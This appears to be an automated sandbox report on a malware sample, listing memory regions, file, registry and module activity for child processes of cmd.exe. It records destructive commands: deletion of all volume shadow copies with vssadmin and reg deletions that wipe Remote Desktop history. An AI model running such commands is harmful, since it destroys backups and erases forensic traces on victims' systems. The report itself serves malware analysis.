pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (107)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	4	Fn
Create	C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	4	Fn
Create	C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Get Info	C:\Windows\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	4	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	3	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\documents	type = file_attributes	1	Fn
Get Info	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents	type = file_attributes	1	Fn
Get Info	STD_INPUT_HANDLE	type = file_type	1	Fn
Get Info	Default.rdp	type = file_attributes	1	Fn
Get Info	STD_ERROR_HANDLE	type = file_type	2	Fn
Open	STD_OUTPUT_HANDLE		21	Fn
Open	STD_INPUT_HANDLE		11	Fn
Open	STD_INPUT_HANDLE		16	Fn
Open	STD_INPUT_HANDLE		14	Fn
Open	STD_INPUT_HANDLE		4	Fn
Open	STD_ERROR_HANDLE		6	Fn
Read	STD_INPUT_HANDLE	size = 8191, size_out = 445	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 434	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 393	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 304	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 219	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 140	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 111	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 85	1	Fn Data
Read	STD_INPUT_HANDLE	size = 8191, size_out = 67	1	Fn Data
Write	STD_ERROR_HANDLE	size = 68	1	Fn Data
Write	STD_ERROR_HANDLE	size = 33	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System		1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor		1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Module (12)

Operation	Module	Additional Information	Count	Logfile
Load	ADVAPI32.dll	base_address = 0x753b0000	1	Fn
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0x49d80000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75140000	2	Fn
Get Filename		process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x7516a84f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75173b92	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75154a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x7516a79d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferIdentifyLevel, address_out = 0x753d2102	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferComputeTokenFromLevel, address_out = 0x753d3352	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = SaferCloseLevel, address_out = 0x753d3825	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-09-07 12:22:26 (UTC)		1	Fn

Environment (45)

Operation	Additional Information	Count	Logfile
Get Environment String		20	Fn Data
Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	2	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Get Environment String	name = userprofile, result_out = C:\Users\YbZ8BTYYvts 7lFSQB0g	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Set Environment String	name = COPYCMD	5	Fn
Set Environment String	name = =ExitCode, value = 00000002	1	Fn
Set Environment String	name = =ExitCodeAscii	5	Fn
Set Environment String	name = =ExitCode, value = 00000001	2	Fn
Set Environment String	name = =ExitCode, value = 00000000	2	Fn
Set Environment String	name = =C:, value = C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents	1	Fn

Process #6: vssadmin.exe'

Information	Value
ID	#6
File Name	c:\windows\syswow64\vssadmin.exe
Command Line	vssadmin.exe Delete Shadows /All /Quiet
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:08:10, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:13
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x480
Parent PID	0x30c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 470 0x 488 0x 7B0 0x 48C 0x 740

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
vssadmin.exe.mui	0x000f0000	0x000fcfff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001a0000	0x001a0000	0x001dffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001e0000	0x001e0000	0x001e0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002a0000	0x002a0000	0x002dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000300000	0x00300000	0x0033ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000360000	0x00360000	0x003dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000400000	0x00400000	0x0043ffff	Private Memory	Readable, Writable	Region Actions Download Dump
vssadmin.exe	0x00560000	0x0057efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000580000	0x00580000	0x00707fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000750000	0x00750000	0x0084ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000850000	0x00850000	0x009d0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009e0000	0x009e0000	0x01ddffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01de0000	0x020aefff	Memory Mapped File	Readable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x74750000	0x7475dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74760000	0x7479afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vssapi.dll	0x747a0000	0x748b5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74bb0000	0x74bc5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
vsstrace.dll	0x74bd0000	0x74bdffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x74be0000	0x74bf3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x74de0000	0x74e6efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75950000	0x75aabfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x75dc0000	0x75e42fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Process #7: reg.exe

(Host: 14, Network: 0)

Information	Value
ID	#7
File Name	c:\windows\syswow64\reg.exe
Command Line	reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:08:11, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:12

OS Process Information

Information	Value
PID	0x77c
Parent PID	0x30c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 310

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000090000	0x00090000	0x00093fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x000b0000	0x00116fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	Readable, Writable	Region Actions
reg.exe.mui	0x00130000	0x00138fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000190000	0x00190000	0x00190fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001d0000	0x001d0000	0x001dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000003d0000	0x003d0000	0x00557fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000590000	0x00590000	0x0068ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000690000	0x00690000	0x00810fff	Pagefile Backed Memory	Readable	Region Actions
reg.exe	0x00ae0000	0x00b31fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000b40000	0x00b40000	0x01f3ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01f40000	0x0220efff	Memory Mapped File	Readable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74d80000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x75700000	0x75705fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x75b70000	0x75ba4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Host Behavior

File (10)

Operation	Filename	Additional Information	Count	Logfile
Get Info	STD_ERROR_HANDLE	type = file_type	2	Fn
Open	STD_ERROR_HANDLE		6	Fn
Write	STD_ERROR_HANDLE	size = 7	1	Fn Data
Write	STD_ERROR_HANDLE	size = 67	1	Fn Data

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System			1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default			1	Fn

Module (1)

Operation	Module	Additional Information	Success	Count	Logfile
Get Handle	c:\windows\syswow64\reg.exe	base_address = 0xae0000		1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2017-09-07 12:22:26 (UTC)		1	Fn

Process #8: reg.exe

(Host: 14, Network: 0)

Information	Value
ID	#8
File Name	c:\windows\syswow64\reg.exe
Command Line	reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:08:11, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:12

OS Process Information

Information	Value
PID	0x764
Parent PID	0x30c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 770

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x000affff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
reg.exe.mui	0x00100000	0x00108fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000120000	0x00120000	0x00120fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000140000	0x00140000	0x001bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000210000	0x00210000	0x0030ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x00310000	0x00376fff	Memory Mapped File	Readable	Region Actions
reg.exe	0x00460000	0x004b1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000004c0000	0x004c0000	0x00647fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000690000	0x00690000	0x0069ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000006a0000	0x006a0000	0x00820fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000830000	0x00830000	0x01c2ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01c30000	0x01efefff	Memory Mapped File	Readable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x74d80000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
